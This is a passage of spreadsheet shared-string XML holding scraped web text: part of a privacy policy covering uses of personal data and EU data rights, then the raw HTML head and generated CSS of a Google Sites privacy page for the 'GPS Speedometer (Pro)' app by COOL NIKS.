location, sufficient to recognize your zip or postal code in order to display local sponsor or underwriter information or notify you of local events.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;We will use your Personal Data as described above and for other purposes, including the following:&lt;/p&gt;&lt;br/&gt;&lt;ul class="list-disc"&gt;&lt;li class="ml-lg"&gt;To fulfill or meet the reason you provided the information.</t>
  </si>
  <si>
    <t>For example, if you share your name and contact information to ask a question about our services, we will use that Personal Data to respond to your inquiry.&lt;/li&gt;&lt;li class="ml-lg"&gt;To fulfill our reporting obligations to underwriters, sponsors, and other partners as described in our Privacy Policy, and to inform our Board of Directors.&lt;/li&gt;&lt;li class="ml-lg"&gt;To provide, support, personalize, and develop our Services, including without limitation, receiving, processing, and responding to feedback.&lt;/li&gt;&lt;li class="ml-lg"&gt;To our third party service providers to allow them to provide features on our behalf as described below.&lt;/li&gt;&lt;li class="ml-lg"&gt;To create, maintain, customize, and secure your account with us.&lt;/li&gt;&lt;li class="ml-lg"&gt;To personalize your experience with the Services and to deliver content, and service offerings relevant to your interests and/or geographic location, including targeted offers and ads through our Services, third-party sites, and via email or text message (with your consent, in accordance with applicable law).&lt;/li&gt;&lt;li class="ml-lg"&gt;For testing, research, analysis, and product development, including to develop and improve our Services and products through focus groups and surveys.&lt;/li&gt;&lt;li class="ml-lg"&gt;To communicate information to you (e.g., new features, products, or services), and to send you relevant emails and communications that may be of interest to you and that you have opted in to receive.&lt;/li&gt;&lt;li class="ml-lg"&gt;To help maintain the safety, security, and integrity of our Services, databases, and other technology assets, and business, including without limitation, to investigate suspected violations of our Terms of Service, suspected fraud, or other unlawful activity.&lt;/li&gt;&lt;li class="ml-lg"&gt;To enforce our agreements, terms, conditions, and policies, and to notify you of any updates to the same.&lt;/li&gt;&lt;li class="ml-lg"&gt;As may be required by law or by a court order, in which case we shall attempt to notify you and work with you to seek to limit the scope of the required disclosure.&lt;/li&gt;&lt;li class="ml-lg"&gt;As described to you when collecting your Personal Data or as otherwise set forth in this Privacy Policy.&lt;/li&gt;&lt;li class="ml-lg"&gt;To evaluate or conduct a merger, divestiture, restructuring, reorganization, dissolution, or other sale or transfer of some or all of our assets, whether as an ongoing concern or as part of bankruptcy, liquidation, or similar proceeding, wherein Personal Data held by us about our users is among the assets transferred, in which case your information will remain subject to the terms of this Privacy Policy.&lt;/li&gt;&lt;li class="ml-lg"&gt;With your consent and as permissible under applicable laws and regulations.&lt;/li&gt;&lt;/ul&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;EU RESIDENTS: YOUR DATA RIGHTS&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;When we are operating as a Controller as described above, Data Subjects are provided with certain rights related to your Personal Data. Note that in circumstances where we are operating as a Processor, you may have similar rights with the controller. In those circumstances, please contact your controller to exercise your rights.</t>
  </si>
  <si>
    <t>We will work with them and with you to address any requests you may have related to exercising your rights as described below.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Please note that the rules in your country may provide you with additional rights or may limit the rights noted below. In all cases, we will act in accordance with applicable laws.&lt;/p&gt;&lt;br/&gt;&lt;ol class="list-decimal"&gt;&lt;li class="ml-lg"&gt;&lt;strong&gt;Right of access.  &lt;/strong&gt;You may obtain confirmation about whether Personal Data concerning you is processed, and request access to the Personal Data, including the purposes of the processing, the categories of Personal Data concerned, a copy of the Personal Data, and the recipients or categories of recipients to whom the Personal Data have been or will be disclosed.</t>
  </si>
  <si>
    <t xml:space="preserve">However, this is not an absolute right and the interests of other individuals may restrict your right of access.&lt;/li&gt;&lt;li class="ml-lg"&gt;&lt;strong&gt;Right to rectification.  &lt;/strong&gt;You may have inaccurate Personal Data concerning you corrected. Depending on the purposes of the processing, you may have the right to have incomplete Personal Data completed, including by providing a supplementary statement.&lt;/li&gt;&lt;li class="ml-lg"&gt;&lt;strong&gt;Right to erasure (&amp;quot;right to be forgotten&amp;quot;). </t>
  </si>
  <si>
    <t>&lt;/strong&gt;Under certain circumstances, you may have Personal Data concerning you erased.&lt;/li&gt;&lt;li class="ml-lg"&gt;&lt;strong&gt; Right to restriction of processing.  &lt;/strong&gt;Under certain circumstances, you may restrict us from processing your Personal Data.</t>
  </si>
  <si>
    <t>In this case, the respective data may only be processed by us for certain purposes.&lt;/li&gt;&lt;li class="ml-lg"&gt;&lt;strong&gt;Right to data portability.  &lt;/strong&gt;Under certain circumstances, you may receive the Personal Data concerning you in a structured, commonly-used, machine-readable format, and you may have the right to transmit that data to another entity without hindrance from us.&lt;/li&gt;&lt;li class="ml-lg"&gt;&lt;strong&gt;Right to object.  &lt;/strong&gt;Under certain circumstances, you may object, on grounds relating to your particular situation, or at any time where Personal Data is processed for direct marketing purposes to the processing of your Personal Data by us, and we can be required to no longer process your Personal Data.</t>
  </si>
  <si>
    <t>If Personal Data concerning you is processed for direct marketing purposes, you also have the right to object at any time to the processing of that Personal Data for that marketing, including profiling to the extent that it is related to the direct marketing. In this case we will no longer process your Per</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="zyVUt0S7BfUQBQYwEmsorQ"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="zyVUt0S7BfUQBQYwEmsorQ"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="zyVUt0S7BfUQBQYwEmsorQ"&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0UPD1A2OlfEhts8AvlLLknS_vQflNFsP_7_tqHVXP4IRtqwlbfCp8gDqZW_hHYcOLIMgqn","je":1,"sstu":1681340146100819,"si":"CPvTnpG4pf4CFXaRIwAdIAsI7A","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747263,5748029,5752694,5753329,5754229,5754594,5760348,5760827,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,5786303,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50224286,50263472,50291080,50313182,50322323,50347762,50455861,50468101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href="https://ssl.gstatic.com/atari/images/public/favicon.ico"&gt;&lt;meta property="og:title" content="coolniks - GPS Speedometer (Pro)"&gt;&lt;meta property="og:type" content="website"&gt;&lt;meta property="og:url" content="https://sites.google.com/site/coolnikscom/gps-speedometer-and-odometer/gps-speedometer-pro"&gt;&lt;meta property="og:description" content="
COOL NIKS built the GPS Speedometer and Odometer (Pro) app as a Commercial app. This SERVICE is provided by COOL NIKS and is intended for use as is.
</t>
  </si>
  <si>
    <t>This page is used to inform visitors regarding our policies with the collection, use, and disclosure of Personal Information if anyone decided to use"&gt;&lt;meta itemprop="name" content="coolniks - GPS Speedometer (Pro)"&gt;&lt;meta itemprop="description" content="
COOL NIKS built the GPS Speedometer and Odometer (Pro) app as a Commercial app. This SERVICE is provided by COOL NIKS and is intended for use as is.
 This page is used to inform visitors regarding our policies with the collection, use, and disclosure of Personal Information if anyone decided to use"&gt;&lt;meta itemprop="url" content="https://sites.google.com/site/coolnikscom/gps-speedometer-and-odometer/gps-speedometer-pro"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Lato%3A300%2C300italic%2C400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="S2KmcO5fW_uHEsDURdgh9w"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="S2KmcO5fW_uHEsDURdgh9w"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Lato%3Ai%2Cbi%2C700%2C400&amp;display=swap" rel="stylesheet" nonce="S2KmcO5fW_uHEsDURdgh9w"&gt;&lt;style nonce="S2KmcO5fW_uHEsDURdgh9w"&gt;@media only screen and (max-width: 479px){.CGqCRe{font-size: 27.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.CGqCRe{font-size: 32.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.CGqCRe{font-size: 36.0pt;}}@media only screen and (min-width: 1280px){.CGqCRe{font-size: 36.0pt;}}@media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nonce="S2KmcO5fW_uHEsDURdgh9w"&gt;&lt;script nonce="zyVUt0S7BfUQBQYwEmsorQ"&gt;&lt;/script&gt;&lt;title&gt;coolniks - GPS Speedometer (Pro)&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="S2KmcO5fW_uHEsDURdgh9w"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color: rgba(33,33,33,1);}.duRjpb .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(98,57,65,1);}.JYVBee .OUGEr{color: rgba(98,57,65,1);}.OmQG5e .OUGEr{color: rgba(33,33,33,1);}.iwQgFb{background-color: rgba(211,211,211,1);}.ySLm4c{font-family: Lato, sans-serif;}.CbiMKe{background-color: rgba(98,57,65,1);}.qeLZfd .zfr3Q{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.qeLZfd .qnVSj{color: rgba(33,33,33,1);}.qeLZfd .Glwbz{color: rgba(33,33,33,1);}.qeLZfd .duRjpb{color: rgba(98,57,65,1);}.qeLZfd .qLrapd{color: rgba(98,57,65,1);}.qeLZfd .JYVBee{color: rgba(98,57,65,1);}.qeLZfd .aHM7ed{color: rgba(98,57,65,1);}.qeLZfd .OmQG5e{color: rgba(33,33,33,1);}.qeLZfd .NHD4Gf{color: rgba(33,33,33,1);}.qeLZfd .aw5Odc{color: rgba(78,46,52,1);}.qeLZfd .dhtgD</t>
  </si>
  <si>
    <t>: hover{color: rgba(98,57,65,1);}.qeLZfd .dhtgD:visited{color: rgba(78,46,52,1);}.qeLZfd .iwQgFb{background-color: rgba(194,194,194,1);}.qeLZfd .OUGEr{color: rgba(33,33,33,1);}.qeLZfd .duRjpb</t>
  </si>
  <si>
    <t>.OUGEr{color: rgba(98,57,65,1);}.qeLZfd .JYVBee .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(98,57,65,1);}.qeLZfd .OmQG5e .OUGEr{color: rgba(33,33,33,1);}.qeLZfd:before{background-color: rgba(236,236,236,1); display: block;}.lQAHbd .zfr3Q{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .dhtgD:hover{color: rgba(255,255,255,0.6999999881);}.lQAHbd .dhtgD:visited{color: rgba(255,255,255,1);}.lQAHbd .iwQgFb{background-color: rgba(255,255,255,0.150000006);}.lQAHbd .OUGEr{color: rgba(255,255,255,1);}.lQAHbd .duRjpb .OUGEr{color: rgba(255,255,255,1);}.lQAHbd .JYVBee .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .OmQG5e .OUGEr{color: rgba(255,255,255,1);}.lQAHbd .CbiMKe{background-color: rgba(255,255,255,1);}.lQAHbd:before{background-color: rgba(98,57,65,1); display: block;}.cJgDec .zfr3Q{color: rgba(255,255,255,1);}.cJgDec .zfr3Q .OUGEr{color</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.cJgDec .NHD4Gf{color: rgba(255,255,255,1);}.cJgDec .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0; display: block;}.O13XJf{height: 340px; padding-bottom: 60px; padding-top: 60px;}.O13XJf .IFuOkc{background-color: rgba(98,57,65,1); background-image: url(https://ssl.gstatic.com/atari/images/simple-header-blended-small.png);}.O13XJf .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0.4; display: block;}.O13XJf .zfr3Q{color: rgba(255,255,255,1);}.O13XJf .qnVSj{color: rgba(255,255,255,1);}.O13XJf .Glwbz{color: rgba(255,255,255,1);}.O13XJf .duRjpb{color:</t>
  </si>
  <si>
    <t>: rgba(33,33,33,1);}.tpmmCb .qnVSj{color: rgba(33,33,33,1);}.tpmmCb .Glwbz{color: rgba(33,33,33,1);}.tpmmCb .qLrapd{color: rgba(33,33,33,1);}.tpmmCb .aHM7ed{color: rgba(33,33,33,1);}.tpmmCb .NHD4Gf{color: rgba(33,33,33,1);}.tpmmCb .IFuOkc:before{background-color: rgba(255,255,255,1); display: block;}.tpmmCb .Wew9ke{fill: rgba(33,33,33,1);}.aw5Odc{color: rgba(78,46,52,1);}.dhtgD:hover{color: rgba(98,57,65,1);}.dhtgD:active{color: rgba(98,57,65,1);}.dhtgD:visited{color: rgba(78,46,52,1);}.Zjiec{color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 19pt; font-weight: 300; letter-spacing: 1px; line-height: 1.3; padding-bottom: 62.5px; padding-left: 48px; padding-right: 36px; padding-top: 11.5px;}.XMyrgf{margin-top: 0px; margin-left: 48px; margin-bottom: 24px; margin-right: 24px;}.TlfmSc{color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 15pt; font-weight: 300; line-height: 1.333;}.Mz8gvb{color: rgba(255,255,255,1);}.zDUgLc{background-color: rgba(33,33,33,1);}.QTKDff.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.YTv4We{color: rgba(178,178,178,1);}.YTv4We:hover:before{background-color: rgba(255,255,255,0.1199999973); display: block;}.YTv4We.chg4Jd:focus:before{border-color: rgba(255,255,255,0.3600000143); display: block;}.eWDljc{background-color: rgba(33,33,33,1);}.eWDljc .hDrhEe{padding-left: 8px;}.ZXW7w{color: rgba(255,255,255,1); opacity: 0.26;}.PsKE7e{color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 12pt; font-weight: 300;}.lhZOrc{color: rgba(255,255,255,1);}.hDrhEe:hover{color: rgba(255,255,255,1);}.M9vuGd{color: rgba(255,255,255,1); font-weight: 400;}.jgXgSe:hover{color: rgba(255,255,255,1);}.j10yRb:hover{color: rgba(129,97,103,1);}.j10yRb.chg4Jd:focus:before{border-color: rgba(255,255,255,0.3600000143); display: block;}.tCHXDc{color: rgba(255,255,255,1);}.iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.wgxiMe{background-color: rgba(33,33,33,1);}.fOU46b .TlfmSc{color: rgba(255,255,255,1);}.fOU46b .KJll8d{background-color: rgba(255,255,255,1);}.fOU46b .Mz8gvb{color: rgba(255,255,255,1);}.fOU46b .Mz8gvb.chg4Jd:focus:before{border-color: rgba(255,255,255,1); display: block;}.fOU46b .qV4dIc{color: rgba(255,255,255,0.8700000048);}.fOU46b .jgXgSe:hover{color: rgba(255,255,255,1);}.fOU46b .M9vuGd{color: rgba(255,255,255,1);}.fOU46b .tCHXDc{color:</t>
  </si>
  <si>
    <t>0;}.LBrwzc .ZXW7w{color: rgba(0,0,0,1);}.LBrwzc .KJll8d{background-color: rgba(0,0,0,1);}.GBy4H .ZXW7w{color: rgba(255,255,255,1);}.GBy4H .KJll8d{background-color: rgba(255,255,255,1);}.eBSUbc{background-color: rgba(33,33,33,1); color: rgba(0,188,212,0.6999999881);}.BFDQOb:hover{color: rgba(255,255,255,1);}.ImnMyf{background-color: rgba(255,255,255,1); color: rgba(33,33,33,1);}.Vs12Bd{background-color: rgba(236,236,236,1); color: rgba(33,33,33,1);}.S5d9Rd{background-color: rgba(98,57,65,1); color: rgba(255,255,255,1);}.zfr3Q{color: rgba(33,33,33,1); font-family: Lato, sans-serif; font-size: 11pt; font-weight: 400; line-height: 1.6667; margin-top: 12px;}.qnVSj{color: rgba(33,33,33,1);}.Glwbz{color: rgba(33,33,33,1);}.duRjpb{color: rgba(98,57,65,1); font-family: Lato, sans-serif; font-size: 34pt; font-weight: 300; letter-spacing: 0.5px; line-height: 1.2; margin-top: 30px;}.Ap4VC{margin-bottom: -30px;}.qLrapd{color: rgba(98,57,65,1);}.JYVBee{color: rgba(98,57,65,1); font-family: Lato, sans-serif; font-size: 19pt; font-weight: 400; line-height: 1.4; margin-top: 20px;}.CobnVe{margin-bottom: -20px;}.aHM7ed{color: rgba(98,57,65,1);}.OmQG5e{color: rgba(33,33,33,1); font-family: Lato, sans-serif; font-size: 15pt; font-style: normal; font-weight: 400; line-height: 1.25; margin-top: 16px;}.GV3q8e{margin-bottom: -16px;}.NHD4Gf{color: rgba(33,33,33,1);}.LB7kq .duRjpb{font-size: 64pt; letter-spacing: 2px; line-height: 1; margin-top: 40px;}.LB7kq .JYVBee{font-size: 25pt; font-weight: 300; line-height: 1.1; margin-top: 25px;}@media only screen and (max-width: 479px){.LB7kq .duRjpb{font-size: 40pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .duRjpb{font-size: 53pt;}}@media only screen and (max-width: 479px){.LB7kq .JYVBee{font-size: 19pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .JYVBee{font-size: 22pt;}}.O13XJf{height: 340px; padding-bottom: 60px; padding-top: 60px;}@media only screen and (min-width: 480px) and (max-width: 767px){.O13XJf{height: 280px; padding-bottom: 40px; padding-top: 40px;}}@media only screen and (max-width: 479px){.O13XJf{height: 250px; padding-bottom: 30px; padding-top: 30px;}}.SBrW1{height: 520px;}@media only screen and (min-width: 480px) and (max-width: 767px){.SBrW1{height: 520px;}}@media only screen and (max-width: 479px){.SBrW1{height: 400px;}}.Wew9ke{fill: rgba(255,255,255,1);}.gk8rDe{height: 180px; padding-bottom: 32px; padding-top: 60px;}.gk8rDe .zfr3Q{color: rgba(0,0,0,1);}.gk8rDe</t>
  </si>
  <si>
    <t>.duRjpb{color: rgba(98,57,65,1); font-size: 45pt; line-height: 1.1;}.gk8rDe .qLrapd{color: rgba(98,57,65,1);}.gk8rDe .JYVBee{color: rgba(98,57,65,1); font-size: 27pt; line-height: 1.35; margin-top: 15px;}.gk8rDe .aHM7ed{color:</t>
  </si>
  <si>
    <t>rgba(98,57,65,1);}.gk8rDe .OmQG5e{color: rgba(33,33,33,1);}.gk8rDe .NHD4Gf{color: rgba(33,33,33,1);}@media only screen and (max-width:</t>
  </si>
  <si>
    <t>479px){.gk8rDe .duRjpb{font-size: 30pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .duRjpb{font-size: 38pt;}}@media only screen and (max-width: 479px){.gk8rDe .JYVBee{font-size: 20pt;}}@media only screen and (min-width: 480px) and (max-width:</t>
  </si>
  <si>
    <t>767px){.gk8rDe .JYVBee{font-size: 24pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe{padding-top: 45px;}}@media only screen and (max-width: 479px){.gk8rDe{padding-bottom: 0px; padding-top: 30px;}}.dhtgD{text-decoration: underline;}.JzO0Vc{background-color: rgba(33,33,33,1); font-family: Lato, sans-serif; width: 250px;}@media only screen and (min-width: 1280px){.JzO0Vc{padding-top: 48.5px;}}.TlfmSc{font-family: Lato, sans-serif; font-size: 15pt; font-weight: 300; line-height: 1.333;}.PsKE7e{font-family: Lato, sans-serif; font-size: 12pt;}.IKA38e{line-height: 1.21;}.hDrhEe{padding-bottom: 11.5px; padding-top: 11.5px;}.zDUgLc{opacity: 1;}.QmpIrf{background-color: rgba(98,57,65,1); border-color: rgba(255,255,255,1) ; color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.xkUom{border-color: rgba(98,57,65,1); color: rgba(98,57,65,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.xkUom:hover{background-color: rgba(98,57,65,0.1000000015);}.KjwKmc{color: rgba(98,57,65,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal; line-height: normal;}.KjwKmc:hover{background-color: rgba(98,57,65,0.1000000015);}.lQAHbd .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(98,57,65,1); color: rgba(98,57,65,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.lQAHbd .xkUom{border-color: rgba(236,236,236,1); color: rgba(236,236,236,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.lQAHbd .xkUom:</t>
  </si>
  <si>
    <t>hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .KjwKmc{color: rgba(236,236,236,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.lQAHbd .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .Mt0nFe{border-color: rgba(255,255,255,0.200000003);}.cJgDec .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(98,57,65,1); color: rgba(98,57,65,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.cJgDec .xkUom{border-color: rgba(236,236,236,1); color: rgba(236,236,236,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.cJgDec .xkUom : hover{background-color: rgba(255,255,255,0.1000000015);}.cJgDec .KjwKmc{color: rgba(236,236,236,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.cJgDec</t>
  </si>
  <si>
    <t>.KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.tpmmCb .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(98,57,65,1); color: rgba(98,57,65,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.tpmmCb .xkUom{border-color: rgba(98,57,65,1); color: rgba(98,57,65,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.tpmmCb .xkUom: hover{background-color: rgba(98,57,65,0.1000000015);}.tpmmCb .KjwKmc{color: rgba(98,57,65,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.tpmmCb .KjwKmc:hover{background-color: rgba(98,57,65,0.1000000015);}.gk8rDe .QmpIrf{background-color: rgba(98,57,65,1); border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.gk8rDe .xkUom{border-color: rgba(98,57,65,1); color: rgba(98,57,65,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.gk8rDe .xkUom:hover{background-color: rgba(98,57,65,0.1000000015);}.gk8rDe .KjwKmc{color: rgba(98,57,65,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.gk8rDe .KjwKmc: hover{background-color: rgba(98,57,65,0.1000000015);}.O13XJf .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(98,57,65,1); color: rgba(98,57,65,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.O13XJf .xkUom{border-color: rgba(236,236,236,1); color: rgba(236,236,236,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.O13XJf .xkUom:hover{background-color: rgba(255,255,255,0.1000000015);}.O13XJf .KjwKmc{color: rgba(236,236,236,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.O13XJf .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.Y4CpGd{font-family: Lato, sans-serif; font-size: 11pt;}.CMArNe{background-color:</t>
  </si>
  <si>
    <t>rgba(236,236,236,1);}.LBrwzc .TlfmSc{color: rgba(0,0,0,0.8000000119);}.LBrwzc .YTv4We{color : rgba(0,0,0,0.6399999857);}.LBrwzc .YTv4We.chg4Jd:focus:before{border-color: rgba(0,0,0,0.6399999857); display: block;}.LBrwzc .Mz8gvb{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.6399999857);}.LBrwzc .tCHXDc{color: rgba(0,0,0,0.6399999857);}.LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.LBrwzc .wgxiMe{background-color: rgba(255,255,255,1);}.LBrwzc .qV4dIc{color: rgba(0,0,0,0.6399999857);}.LBrwzc .M9vuGd{color: rgba(0,0,0,0.8000000119); font-weight: bold;}.LBrwzc .Zjiec{color: rgba(0,0,0,0.8000000119);}.LBrwzc .IKA38e{color: rgba(0,0,0,0.6399999857);}.LBrwzc .lhZOrc.</t>
  </si>
  <si>
    <t>IKA38e{color: rgba(0,0,0,0.8000000119); font-weight: bold;}.LBrwzc .j10yRb:hover{color: rgba(0,0,0,0.8000000119);}.LBrwzc .eBSUbc{color: rgba(0,0,0,0.8000000119);}.LBrwzc .hDrhEe :hover{color: rgba(0,0,0,0.8000000119);}.LBrwzc .jgXgSe</t>
  </si>
  <si>
    <t>: hover{color: rgba(0,0,0,0.8000000119);}.LBrwzc .M9vuGd :</t>
  </si>
  <si>
    <t>hover{color: rgba(0,0,0,0.8000000119);}.LBrwzc .zDUgLc{border-bottom-color: rgba(204,204,204,1); border-bottom-width: 1px; border-bottom-style: solid;}.fOU46b .LBrwzc .M9vuGd{color: rgba(0,0,0,0.8000000119);}.fOU46b .LBrwzc .jgXgSe</t>
  </si>
  <si>
    <t>: hover{color: rgba(0,0,0,0.8000000119);}.fOU46b .LBrwzc .zDUgLc{opacity:</t>
  </si>
  <si>
    <t>1; border-bottom-style: none;}.fOU46b .LBrwzc .tCHXDc{color: rgba(0,0,0,0.6399999857);}.fOU46b .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.fOU46b .GBy4H .M9vuGd{color: rgba(255,255,255,1);}.fOU46b .GBy4H .jgXgSe</t>
  </si>
  <si>
    <t>: hover{color: rgba(255,255,255,1);}.fOU46b .GBy4H .zDUgLc{opacity:</t>
  </si>
  <si>
    <t>1;}.fOU46b .GBy4H .tCHXDc{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .iWs3gf.chg4Jd: focus{background-color: rgba(255,255,255,0.1199999973);}.XeSM4.G9Qloe.fOU46b .LBrwzc .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.6399999857);}.XeSM4.G9Qloe.fOU46b .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.GBy4H .lhZOrc. IKA38e{color: rgba(255,255,255,1);}.GBy4H .eBSUbc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.GBy4H .hDrhEe:hover{color: rgba(255,255,255,1);}.GBy4H .j10yRb:hover{color: rgba(255,255,255,1);}.GBy4H .YTv4We{color: rgba(255,255,255,1);}.GBy4H .YTv4We.chg4Jd:focus:before{border-color: rgba(255,255,255,1); display: block;}.GBy4H .tCHXDc{color: rgba(255,255,255,0.8700000048);}.GBy4H .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.GBy4H .jgXgSe:hover{color: rgba(255,255,255,1);}.GBy4H .jgXgSe:hover{color: rgba(255,255,255,1);}.GBy4H .M9vuGd{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.GBy4H .M9vuGd:hover{color: rgba(255,255,255,1);}.QcmuFb{padding-left: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200px;}.TMjjoe{font-family: Lato, sans-serif; font-size: 9pt; line-height: 1.2; margin-top: 0px;}@media only screen and (min-width: 1280px){.yxgWrb{margin-left: 250px;}}@media only screen and (max-width: 479px){.Zjiec{font-size: 15pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Zjiec{font-size: 17pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.PsKE7e{font-size: 12pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.PsKE7e{font-size: 12pt;}}@media only screen and (max-width: 479px){.duRjpb{font-size: 24pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.duRjpb{font-size: 29pt;}}@media only screen and (max-width: 479px){.JYVBee{font-size: 15pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.JYVBee{font-size: 17pt;}}@media only screen and (max-width: 479px){.OmQG5e{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.OmQG5e{font-size: 14pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.PsKE7e{font-size: 12pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.PsKE7e{font-size: 12pt;}}@media only screen and (max-width: 479px){.TMjjoe{font-size: 9pt;}}@media only screen and (min-width: 480px) and (max-width:</t>
  </si>
  <si>
    <t>767px){.TMjjoe{font-size: 9pt;}}&lt;/style&gt;&lt;script nonce="zyVUt0S7BfUQBQYwEmsorQ"&gt;_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL0UPD1A2OlfEhts8AvlLLknS_vQflNFsP_7_tqHVXP4IRtqwlbfCp8gDqZW_hHYcOLIMgqn",1,"CPvTnpG4pf4CFXaRIwAdIAsI7A",1681340146100819,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747263,5748029,5752694,5753329,5754229,5754594,5760348,5760827,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,5786303,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50224286,50263472,50291080,50313182,50322323,50347762,50455861,50468101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0,null,"v2beta",null,null,null,null,null,null,4,"https://accounts.google.com/o/oauth2/iframe",null,null,null,null,null,null,"https://1461849555-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https://sites.google.com/site/coolnikscom/gps-speedometer-and-odometer/gps-speedometer-pro",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[1681340146114,"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{"enableAnalytics":true,"webPropertyId":"","showDebug":false,"hashedSiteId":"836c5a25e57e9e72fd9ae3fa598a67b8df64b137b00dac451c8742f990eaf3c2","normalizedPath":"site/coolnikscom/gps-speedometer-and-odometer/gps-speedometer-pro","pageTitle":"GPS Speedometer 